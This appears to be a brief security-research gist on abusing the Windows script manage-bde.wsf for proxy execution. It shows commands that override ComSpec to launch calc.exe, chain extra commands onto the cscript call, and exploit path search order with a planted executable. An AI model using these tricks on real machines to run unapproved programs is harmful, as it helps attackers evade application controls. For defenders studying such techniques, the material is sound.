Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Abusing manage-bde.wsf
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.
Here are a few examples that you may or may not find useful -
1) Replace ComSpec Variable
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf
2) Apply Redirection/Conditionals
cscript manage-bde.wsf [|,||,&,&&, etc.] [cmd]
3) Path Search Order (Credit: Thanks to @danielhbohannon for pointing this out)
"Manage-bde.exe is not pathed, so calling cscript manage-bde.wsf from c:\users\public will first try to execute c:\users\public\manage-bde.exe if it's present" -
4) ...I'm sure there are other ways
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment